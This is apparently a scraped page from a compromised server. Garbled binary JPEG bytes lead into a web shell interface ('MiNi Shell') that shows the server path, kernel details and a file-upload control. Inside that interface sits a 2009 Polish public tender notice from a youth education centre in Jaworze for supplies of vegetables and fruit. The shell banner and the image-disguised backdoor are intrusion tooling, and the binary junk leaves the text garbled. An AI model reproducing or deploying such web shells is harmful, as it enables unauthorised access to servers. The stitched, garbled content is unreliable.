JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090319/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090319/69560-N-2009.html

<p class="kh_header"><b>Jaworze: Dostawa wraz z transportem warzyw i owoców</b><br>
<b>Numer ogłoszenia: 69560 - 2009; data zamieszczenia: 19.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Młodzieżowy Ośrodek Wychowawczy , ul. Pałacowa 1, 43-384 Jaworze, woj. śląskie, tel. 0-33 8172172, faks 0-33 8172172.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.silesia-region.pl/mowjaworze</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> bip.silesia-region.pl/mowjaworze</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wraz z transportem warzyw i owoców.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający zaprasza do udziału w postępowaniu prowadzonym w trybie przetargu nieograniczonego na wykonanie dostaw pod nazwą: sukcesywne dostawy wraz     z transportem   warzyw i owoców  zgodnie z wymogami określonymi   w niniejszej Specyfikacji Istotnych Warunków Zamówienia, zwanej dalej SIWZ. 
Do udzielenia przedmiotowego zamówienia stosuje się przepisy ustawy z dnia          29 stycznia 2004r. - Prawo zamówień publicznych tekst jednolity Dz. U. z 2007 r.   Nr 223 poz. 1655 z póź.zm163, zwanej dalej ustawą oraz akty wykonawcze a w sprawach nieuregulowanych ustawą, przepisy ustawy - Kodeks cywilny. 
III. Opis przedmiotu zamówienia 
1. Przedmiotem zamówienia jest sukcesywna dostawa wraz z transportem warzyw i owoców w  ilości   określonych poniżej :
Warzywa świeże   CPV  01121000-1
L.p.     
	Nazwa artykułu	Jednostka miary  	Maksymalna ilość w roku
1	Burak czerwony	kg	160
2	Cebula 	kg	331
3	Ziemniak	kg	4320
4	Kapusta czerwona 	kg	155
5	Kapusta biała 	kg	405
6	Marchew	kg	190
7	Pietruszka	kg	85
8	Seler	kg	85
9	Pieczarka	kg	72
10	Por	kg	80
	Warzywa sezonowe 		
1	Ogórek zielony	kg	100
2	Pomidor	kg	150
3	Kalafior	szt.	50
4	Kalarepa	kg	10
5	Pietruszka zielona	pęcz	 90
6	Sałata zielona 	szt.	50
7	Koperek zielony	pęcz	90
8	Szczypiorek	pęcz	130
9	Cebulka zielona	pęcz	70
10	Kapusta pekińska	kg	50
11	Rzodkiewka	pęcz	 140
12	Botwinka	kg	 15
13	Papryka świeża	kg	 25
14	Cukinia	kg	 10
15	Fasola szparagowa	kg	20
	 Warzywa kiszone  CPV 15331142-4
L.p.     
	Nazwa artykułu	Jednostka miary  	Maksymalna ilość w roku
1	Kapusta kiszona	kg	 291
2	Ogórek  kiszony	kg	 143
3	Żurek 0,5 l	szt.	 150
             Owoce   CPV 01131200-6; 01131111-5; 01131300-7;01131300-6
L.p.     
	Nazwa artykułu	Jednostka miary  	Maksymalna ilość w roku
1	Cytryna	kg	40
2	Pomarańcze 	kg	150
3	Mandarynki	kg	100
4	Kiwi 	kg	30
5	Banany 	kg	235
6	Rabarbar	kg	20
7	Truskawka	kg	36
8	Arbuz	kg	150
9	Jabłko	kg	283
10	Śliwki	kg	140
11	Gruszka	kg	15
12	Nektarynka 	szt.	180
13	Brzoskwinia	szt.	180
14	Agrest	kg	20
15	Wiśnie	kg	20

2. Przedmiot zamówienia winien być wytwarzany zgodnie z obowiązującymi 
    przepisami,  a w szczególności z: 
a. Ustawą z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia 
    Dz. U. z 2006 r. Nr 171, poz. 1225, oraz aktami wykonawczymi wydanymi na  
    podstawie tej ustawy, 
b. Rozporządzeniem WE nr 1935 Parlamentu Europejskiego i Rady z dnia 27 
    października 2004r., w sprawie materiałów i wyrobów przeznaczonych do kontaktu
    z żywnością oraz uchylające Dyrektywy 80590EWG i 89109EWG, 
c. Rozporządzeniem WE nr 852  2004 z dnia 29 kwietnia 2004 r. w sprawie higieny
    środków spożywczych Dz. Urz. UE L 139 z 30.04.2004 r., 
d. Rozporządzeniem Ministra Rolnictwa i Rozwoju Wsi z dnia 16 grudnia 2002 r.       
    w sprawie znakowania środków spożywczych i dozwolonych substancji  
    dodatkowych Dz. U. Nr 220, poz. 1856 z 2002r.z późn. zm, 
e. Ustawą z dnia 21 grudnia 2000r o jakości handlowej artykułów rolno - 
    spożywczych. tekst jednolity: Dz. U. z 2005 r. Nr 187, poz. 1577 z późn. zm. 
3. Warunki dodatkowe dotyczące przedmiotu zamówienia: 
a Dostawa przedmiotu zamówienia do magazynu żywnościowego Zamawiającego
       transportem Wykonawcy i na jego koszt. 
b Przedmiot zamówienia winien być dostarczony wyłącznie specjalistycznym
       transportem, zgodnie z obowiązującymi przepisami. 
c Dostawy odbywają się po telefonicznym lub pisemnym zgłoszeniu przez 
       Zamawiającego ilości oraz asortymentu każdej dostawy. W imieniu  
       Zamawiającego działa magazynier . 
 d Pisemne zgłoszenie kolejnego zamówienia może być przekazywane
       przedstawicielowi Wykonawcy podczas bieżącej dostawy. Ewentualne zmiany 
       dotyczące zamówienia będą odbywać się w formie telefonicznej. 
e Wykonawca gwarantuje Zamawiającemu, że przedmiot zamówienia będzie
        wolny od wad jakościowych.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 01.12.10.00-1, 15.33.11.42-4, 01.13.12.00-6, 01.13.11.11-5, 01.13.13.00-7, 01.13.13.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 9.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O zamówienie mogą ubiegać się wykonawcy, którzy
1.1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, 
       jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
       a W celu potwierdzenia uprawnień Wykonawca musi prowadzić działalność 
           gospodarczą adekwatną do przedmiotu zamówienia. 
       b Stosować system HACCP. 
       c Wykonawca składa oświadczenie, że nie zalega z opłaceniem podatków, opłat
           oraz składek na ubezpieczenie zdrowotne i społeczne, lub że uzyskał 
           przewidywane prawem zezwolenie, odroczenie lub rozłożenie na raty 
           zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego
           organu - załącznik nr 6 do niniejszej SIWZ. 

1.2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem 
      technicznym i osobami zdolnymi do wykonania zamówienia. 
      a. Wykonali, a w przypadku świadczeń okresowych lub ciągłych również 
          wykonywanych w ciągu ostatnich 3 lat minimum 2 porównywalne dostawy, a
          jeżeli okres działalności jest krótszy, w tym okresie. 
      b. Wykonawca nie podlega wykluczeniu z postępowania o udzielenie 
          zamówienia art. 22 ust. 1 oraz art. 24 ust. 1 i 2 ustawy. Wykonawca jest 
          zobowiązany do złożenia oświadczenia, iż spełnia warunki określone w art. 22 
          ust. 1 ustawy Prawo zamówień publicznych i nie podlega wykluczeniu z art. 24
          ust. 1 i 2 wg wzoru. Należy złożyć druk, będący załącznikiem nr 1 do SIWZ. 
UWAGA! 
W przypadku złożenia oferty wspólnej konsorcjum, spółka jawna, cywilna itp.oświadczenie o nie podleganiu wykluczeniu z art. 24 ust. 1 i 2 składa każdy wykonawca oddzielnie. 
2. Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą spełnia 
    - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach
    wyszczególnionych w pkt XI niniejszej SIWZ. Z treści załączonych dokumentów 
    musi wynikać jednoznacznie, iż ww warunki Wykonawca spełnił. 
3. Nie spełnienie ww warunków skutkować będzie wykluczeniem Wykonawcy z 
    postępowania. 
4. Wykonawca ma prawo złożyć tylko jedną ofertę .
5.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim 
    przypadku ich oferta musi spełniać następujące wymagania: 
a Wykonawcy występujący wspólnie konsorcja muszą ustanowić pełnomocnika 
    lidera do reprezentowania lub do reprezentowania i zawarcia umowy w 
     postępowaniu o udzielenie niniejszego zamówienia. Wszelka korespondencja 
    prowadzona  będzie wyłącznie pełnomocnikiem liderem konsorcjum, 
b W odniesieniu do wymagań postawionych przez Zamawiającego, każdy z 
     przedsiębiorców wchodzący w skład konsorcjum oddzielnie musi 
     udokumentować, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 
     ustawy Prawo   zamówień  publicznych, 
6. Wykonawcy ponoszą wszelkie koszty związane z przygotowaniem 
    i złożeniem oferty, z zastrzeżeniem art. 93 ust. 4 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oferta musi zawierać następujące dokumenty i oświadczenia
    a wypełniony formularz ofertowy - załącznik nr 2 do SIWZ 
    b wypełniony formularz cenowy - załącznik nr 3 do SIWZ
    c pełnomocnictwo podmiotów występujących wspólnie
    d aktualny odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji 
        działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru 
        lub zgłoszenia do ewidencji działalności gospodarczej wystawiony nie wcześniej  niż 6 miesięcy przed upływem terminu składania ofert
   e oświadczenie potwierdzające odpowiednio, że wykonawca nie zalega z opłaceniem   
        podatków, opłat oraz składek na ubezpieczenie zdrowotne i 
       społeczne, lub zaświadczeń, że uzyskał przewidywane prawem zezwolenie, 
       odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości
       wykonania decyzji właściwego organu załącznik nr 6. 
   f wykaz wykonanych dostaw, a w przypadku świadczeń okresowych lub ciągłych  również wykonywanych, w okresie nie dłuższym niż ostatnie 3 lata, a jeżeli okres  prowadzenia  działalności jest krótszy - w tym okresie dwóch max. 10 odpowiadających swoim  rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich 
      wartości, przedmiotu zamówienia, dat wykonania i odbiorców oraz dokumentów 
      potwierdzających, że te dostawy zostały wykonane należycie załącznik nr 4 do SIWZ
  g oświadczenie, że wykonawca spełnia warunki udziału w postępowaniu określone
      w art. 22 ust. 1 i art. 24 ust. 1,2 Ustawy prawo zamówień publicznych - załącznik  nr 1 do SIWZ. 
  h potwierdzenie stosowania przepisów żywnościowych Rozdz. III pkt. 3ujętych w 
      załączniku nr 7 do SIWZ oraz systemu HACCP w jednej z następującej  formie: 
       -  certyfikatu systemu HACCP wydanego przez firmy posiadające akredytacje    
           i   uprawnienia Polskiego  Centrum Akredytacji z siedzibą w Warszawie lub 
           krajowej organizacji   akredytacyjnej dla danego kraju
      -   zaświadczenie lub inny dokument właściwego organu Państwowej Inspekcji  
          Sanitarnej lub organu Inspekcji Weterynaryjnej o stosowaniu zasad systemu 
          HACCP; 
      -  oświadczenie - załącznik nr 7 do niniejszej SIWZ. 
2. Dokumenty dołączone do oferty mogą być przedstawione w formie oryginału lub 
    kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę tj. przez 
    osobę y upoważnioną/e do reprezentowania Wykonawcy. 
3. Brak jakiegokolwiek z wyżej wymienionych dokumentów spowoduje wykluczenie
    Wykonawcy z postępowania z mocy art. 24 ust. 2 pkt 3. 
4. Zamawiający informuje, że zgodnie z art. 96 ust. 3 ustawy Prawo zamówień publicznych     
    oferty składane w postępowaniu o zamówienie publiczne są jawne  i podlegają 
    udostępnieniu od chwili ich otwarcia, z wyjątkiem informacji stanowiących tajemnicę 
    przedsiębiorstwa w rozumieniu przepisów o zwalczaniu  nieuczciwej konkurencji, jeśli 
    Wykonawca, nie później niż w terminie składania  ofert, zastrzegł, że nie mogą one być   
    udostępniane. 
5. Stosowne zastrzeżenie Wykonawca winien złożyć na formularzu ofertowym. 
     W przeciwnym razie cała oferta zostanie uznana za jawną. 
6. Informacje zastrzeżone jako tajemnica przedsiębiorstwa powinny być przez Wykonawcę  
    złożone w oddzielnej kopercie z oznakowaniem tajemnica  przedsiębiorstwa lub spięte  zszyte oddzielnie od pozostałych, jawnych elementów oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip.silesia-region.pl/mowjaworze.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Młodzieżowy Ośrodek Wychowawczy w Jaworzu ul. Pałacowa 1.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2009 godzina 10:00, miejsce: Młodzieżowy Ośrodek Wychowawczy w jaworzu ul. Pałacowa 1 sekretariat  ośrodka.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com